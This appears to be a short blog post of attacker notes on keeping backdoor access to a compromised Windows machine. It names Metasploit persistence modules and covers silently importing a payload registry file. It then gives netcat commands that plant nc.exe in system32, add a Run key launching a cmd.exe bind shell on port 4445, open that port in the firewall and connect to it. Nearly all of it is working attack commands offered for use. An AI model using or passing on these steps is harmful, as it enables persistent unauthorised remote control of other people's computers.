INSTALLING PRESISTENCE BACKDOOR IN WINDOWS

USING METASPLOIT 

windows/local/s4u_persistence 
windows/local/vss_persistence 
windows/local/registry_persistence 

windows/manage

MENUALLY INSTALLING REGISTRY PERSISTENCE

meterpreter>
upload paylod.reg
shell>
regedit /s payload.reg
del payload.reg



USING NETCAT 

meterpreter>

upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’

C:\WINDOWS\system32>

netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445

netsh firewall show portopening

nc -nv 192.168.0.101 4445


No comments:

Post a Comment

Popular Posts